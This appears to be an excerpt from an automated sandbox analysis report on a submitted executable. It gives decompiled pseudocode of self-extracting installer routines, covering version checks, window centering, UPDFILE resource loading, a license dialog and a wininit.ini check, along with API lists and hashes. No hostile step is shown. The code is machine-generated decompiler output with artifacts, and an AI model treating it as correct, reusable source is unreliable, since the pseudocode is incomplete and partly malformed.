                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E00E72773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t11 =  &_v32; // 0xe73938
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									_t16 =  &_v32; // 0xe73938
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00E72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00E72A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}

































                                                                                                                                                                                                      0x00e72a37
                                                                                                                                                                                                      0x00e72a41
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72955
                                                                                                                                                                                                      0x00e7295e
                                                                                                                                                                                                      0x00e72962
                                                                                                                                                                                                      0x00e72969
                                                                                                                                                                                                      0x00e7296f
                                                                                                                                                                                                      0x00e72974
                                                                                                                                                                                                      0x00e7297e
                                                                                                                                                                                                      0x00e7298c
                                                                                                                                                                                                      0x00e72a20
                                                                                                                                                                                                      0x00e72a21
                                                                                                                                                                                                      0x00e72a27
                                                                                                                                                                                                      0x00e72a4c
                                                                                                                                                                                                      0x00e72a4f
                                                                                                                                                                                                      0x00e72a50
                                                                                                                                                                                                      0x00e72a53
                                                                                                                                                                                                      0x00e72a56
                                                                                                                                                                                                      0x00e72a5c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e729b2
                                                                                                                                                                                                      0x00e729b2
                                                                                                                                                                                                      0x00e729b5
                                                                                                                                                                                                      0x00e729bd
                                                                                                                                                                                                      0x00e729c3
                                                                                                                                                                                                      0x00e729cc
                                                                                                                                                                                                      0x00e729d5
                                                                                                                                                                                                      0x00e729d7
                                                                                                                                                                                                      0x00e729da
                                                                                                                                                                                                      0x00e729dd
                                                                                                                                                                                                      0x00e729df
                                                                                                                                                                                                      0x00e729ec
                                                                                                                                                                                                      0x00e729f8
                                                                                                                                                                                                      0x00e729fc
                                                                                                                                                                                                      0x00e729ff
                                                                                                                                                                                                      0x00e72a02
                                                                                                                                                                                                      0x00e72a07
                                                                                                                                                                                                      0x00e72a0a
                                                                                                                                                                                                      0x00e72a0f
                                                                                                                                                                                                      0x00e72a19
                                                                                                                                                                                                      0x00e72a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e72a0f
                                                                                                                                                                                                      0x00e7298c
                                                                                                                                                                                                      0x00e72974
                                                                                                                                                                                                      0x00e72962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e7294f
                                                                                                                                                                                                      0x00e72912
                                                                                                                                                                                                      0x00e72a65
                                                                                                                                                                                                      0x00e72a68
                                                                                                                                                                                                      0x00e72a6c
                                                                                                                                                                                                      0x00e72a6f
                                                                                                                                                                                                      0x00e72a6f
                                                                                                                                                                                                      0x00e72a7d

APIs
• GlobalFree.KERNEL32 ref: 00E72A6F
  • Part of subcall function 00E72773: CharUpperA.USER32(D47724E2,00000000,00000000,00000000), ref: 00E727A8
  • Part of subcall function 00E72773: CharNextA.USER32(0000054D), ref: 00E727B5
  • Part of subcall function 00E72773: CharNextA.USER32(00000000), ref: 00E727BC
  • Part of subcall function 00E72773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72829
  • Part of subcall function 00E72773: RegQueryValueExA.ADVAPI32(?,00E71140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72852
  • Part of subcall function 00E72773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E72870
  • Part of subcall function 00E72773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00E728A0
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00E73938,?,?,?,?,-00000005), ref: 00E72958
• GlobalLock.KERNEL32 ref: 00E72969
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00E73938,?,?,?,?,-00000005,?), ref: 00E72A21
• GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00E73938,?,?), ref: 00E72A81
Strings
Memory Dump Source
• Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
• Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
Similarity
• API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
• String ID: 89
• API String ID: 3949799724-2925746602
• Opcode ID: 53fe3f83fbea1a4f760242bd1fa40a9f81f899ce17b04433543589f29429c1a9
• Instruction ID: 03ff501c3baa196401992ff02c7aa35f9bab65debb264efc5e15f3fa586fe17f
• Opcode Fuzzy Hash: 53fe3f83fbea1a4f760242bd1fa40a9f81f899ce17b04433543589f29429c1a9
• Instruction Fuzzy Hash: C5511931900219DFCB21CF99D884AAEBBB5FF88704F14906EEA19F3261DB319941DB90
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 86%
E00E743D0(struct HWND__* __ecx, struct HWND__* __edx) {
    signed int _v8;
    struct tagRECT _v24;
    struct tagRECT _v40;
    struct HWND__* _v44;
    intOrPtr _v48;
    int _v52;
    intOrPtr _v56;
    int _v60;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t29;
    void* _t53;
    intOrPtr _t56;
    int _t59;
    struct HWND__* _t63;
    struct HWND__* _t67;
    struct HWND__* _t68;
    struct HDC__* _t69;
    int _t72;
    signed int _t74;

    _t63 = __edx;
    _t29 =  *0xe78004; // 0xd47724e2
    _v8 = _t29 ^ _t74;
    _t68 = __edx;
    _v44 = __ecx;
    GetWindowRect(__ecx,  &_v40);
    _t53 = _v40.bottom - _v40.top;
    _v48 = _v40.right - _v40.left;
    GetWindowRect(_t68,  &_v24);
    _v56 = _v24.bottom - _v24.top;
    _t69 = GetDC(_v44);
    _v52 = GetDeviceCaps(_t69, 8);
    _v60 = GetDeviceCaps(_t69, 0xa);
    ReleaseDC(_v44, _t69);
    _t56 = _v48;
    asm("cdq");
    _t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
    _t67 = 0;
    if(_t72 >= 0) {
                                                                                                                                                                                                      					_t63 = _v52;
                                                                                                                                                                                                      					if(_t72 + _t56 > _t63) {
                                                                                                                                                                                                      						_t72 = _t63 - _t56;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t72 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				asm("cdq");
                                                                                                                                                                                                      				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                                                                                                                                                                      				if(_t59 >= 0) {
                                                                                                                                                                                                      					_t63 = _v60;
                                                                                                                                                                                                      					if(_t59 + _t53 > _t63) {
                                                                                                                                                                                                      						_t59 = _t63 - _t53;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t59 = _t67;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                                                                                                                                                                      			}

























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00E743F1
                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 00E7440B
                                                                                                                                                                                                      • GetDC.USER32(?), ref: 00E74423
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00E7442E
                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00E7443A
                                                                                                                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00E74447
                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 00E744A2
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$CapsDeviceRect$Release
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2212493051-0
                                                                                                                                                                                                      • Opcode ID: 6bc8186aa2a03a81439c2813f56244863011835de2a9c631bde32f62d209ff9d
                                                                                                                                                                                                      • Instruction ID: 6cbfa8e8433e31b3cb1d0605016fe2dac886dc297cc7335cb3ca1e8e5f940800
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6bc8186aa2a03a81439c2813f56244863011835de2a9c631bde32f62d209ff9d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 87314F72E00119AFDB14CFB9DD489EEBBB5EB89310F554169F809B3240EA306D459B60
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 53%
                                                                                                                                                                                                      			E00E76298(intOrPtr __ecx, intOrPtr* __edx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				struct HINSTANCE__* _v36;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t16;
                                                                                                                                                                                                      				struct HRSRC__* _t21;
                                                                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                                                                      				void* _t30;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				intOrPtr* _t40;
                                                                                                                                                                                                      				void* _t41;
                                                                                                                                                                                                      				intOrPtr* _t44;
                                                                                                                                                                                                      				intOrPtr* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				signed int _t50;
                                                                                                                                                                                                      				struct HINSTANCE__* _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t44 = __edx;
                                                                                                                                                                                                      				_t16 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                      				_t46 = 0;
                                                                                                                                                                                                      				_v32 = __ecx;
                                                                                                                                                                                                      				_v36 = 0;
                                                                                                                                                                                                      				_t36 = 1;
                                                                                                                                                                                                      				E00E7171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                                      					_t51 = _t51 + 0x10;
                                                                                                                                                                                                      					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                      					if(_t21 == 0) {
                                                                                                                                                                                                      						break;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                      					if(_t45 == 0) {
                                                                                                                                                                                                      						 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      						_t36 = _t46;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                      						_t44 = _t5;
                                                                                                                                                                                                      						_t40 = _t44;
                                                                                                                                                                                                      						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                      						_t47 = _t6;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t26 =  *_t40;
                                                                                                                                                                                                      							_t40 = _t40 + 1;
                                                                                                                                                                                                      						} while (_t26 != 0);
                                                                                                                                                                                                      						_t41 = _t40 - _t47;
                                                                                                                                                                                                      						_t46 = _t51;
                                                                                                                                                                                                      						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                      						 *0xe7a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                      						_t30 = _v32();
                                                                                                                                                                                                      						if(_t51 != _t51) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(_t45);
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							_t36 = 0;
                                                                                                                                                                                                      							FreeResource(??);
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							FreeResource();
                                                                                                                                                                                                      							_v36 = _v36 + 1;
                                                                                                                                                                                                      							E00E7171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                      							_t46 = 0;
                                                                                                                                                                                                      							continue;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L12:
                                                                                                                                                                                                      					return E00E76CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L12;
                                                                                                                                                                                                      			}























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7171E: _vsnprintf.MSVCRT ref: 00E71750
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E762CD
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E762D4
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E7631B
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00E76345
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,00E751CA,00000004,00000024,00E72F71,?,00000002,00000000), ref: 00E76357
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                      • String ID: UPDFILE%lu
                                                                                                                                                                                                      • API String ID: 2922116661-2329316264
                                                                                                                                                                                                      • Opcode ID: 779188bb9e4c2e3368da27649f3ad8a7a18c9a86ef90e177246ad2d6c298c69c
                                                                                                                                                                                                      • Instruction ID: 30bd7635b97fe80f64f76f0349e59f213a2a570e7c4a8bdcad68c3b7b4866836
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 779188bb9e4c2e3368da27649f3ad8a7a18c9a86ef90e177246ad2d6c298c69c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F3210471A00619AFDB109F65CC459FFBB78EB84708B048169F90AB3241DB358D06CBE0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00E73A3F(void* __eflags) {
                                                                                                                                                                                                      				void* _t3;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				CHAR* _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = "LICENSE";
                                                                                                                                                                                                      				_t1 = E00E7468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                      				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                      				 *0xe78d4c = _t3;
                                                                                                                                                                                                      				if(_t3 != 0) {
                                                                                                                                                                                                      					_t19 = _t16;
                                                                                                                                                                                                      					if(E00E7468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA( *0xe78d4c, "<None>") == 0) {
                                                                                                                                                                                                      							LocalFree( *0xe78d4c);
                                                                                                                                                                                                      							L9:
                                                                                                                                                                                                      							 *0xe79124 = 0;
                                                                                                                                                                                                      							return 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t9 = E00E76517(_t19, 0x7d1, 0, E00E73100, 0, 0);
                                                                                                                                                                                                      						LocalFree( *0xe78d4c);
                                                                                                                                                                                                      						if(_t9 != 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe79124 = 0x800704c7;
                                                                                                                                                                                                      						L2:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					E00E744B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					LocalFree( *0xe78d4c);
                                                                                                                                                                                                      					 *0xe79124 = 0x80070714;
                                                                                                                                                                                                      					goto L2;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				E00E744B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      				 *0xe79124 = E00E76285();
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}







                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00E72F64,?,00000002,00000000), ref: 00E73A5D
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00E73AB3
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                        • Part of subcall function 00E76285: GetLastError.KERNEL32(00E75BBC), ref: 00E76285
                                                                                                                                                                                                      • lstrcmpA.KERNEL32(<None>,00000000), ref: 00E73AD0
                                                                                                                                                                                                      • LocalFree.KERNEL32 ref: 00E73B13
                                                                                                                                                                                                        • Part of subcall function 00E76517: FindResourceA.KERNEL32(00E70000,000007D6,00000005), ref: 00E7652A
                                                                                                                                                                                                        • Part of subcall function 00E76517: LoadResource.KERNEL32(00E70000,00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00E76538
                                                                                                                                                                                                        • Part of subcall function 00E76517: DialogBoxIndirectParamA.USER32(00E70000,00000000,00000547,00E719E0,00000000), ref: 00E76557
                                                                                                                                                                                                        • Part of subcall function 00E76517: FreeResource.KERNEL32(00000000,?,?,00E72EE8,00000000,00E719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00E76560
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00E73100,00000000,00000000), ref: 00E73AF4
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$LICENSE
                                                                                                                                                                                                      • API String ID: 2414642746-383193767
                                                                                                                                                                                                      • Opcode ID: eed5f9c7526a76da6bf5bc351cb6f05850112f90e1219a7bfea232e855ad7637
                                                                                                                                                                                                      • Instruction ID: ef0d1e7eabe32648689be27c68eb882169a6f90075ef63e7f102f2ddd93f2d4f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: eed5f9c7526a76da6bf5bc351cb6f05850112f90e1219a7bfea232e855ad7637
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C11A5703412016FD760EF73AD09E1B3AEDDBD5710B10E43EBA4DF51E1DA798845A621
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 94%
                                                                                                                                                                                                      			E00E724E0(void* __ebx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t7;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				long _t26;
                                                                                                                                                                                                      				signed int _t27;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = __ebx;
                                                                                                                                                                                                      				_t7 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                      				_t25 = 0x104;
                                                                                                                                                                                                      				_t26 = 0;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					E00E7658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                      					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                      					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                      					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                      						_lclose(_t25);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00E76CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00E72506
                                                                                                                                                                                                      • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 00E7252C
                                                                                                                                                                                                      • _lopen.KERNEL32(?,00000040), ref: 00E7253B
                                                                                                                                                                                                      • _llseek.KERNEL32(00000000,00000000,00000002), ref: 00E7254C
                                                                                                                                                                                                      • _lclose.KERNEL32(00000000), ref: 00E72555
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
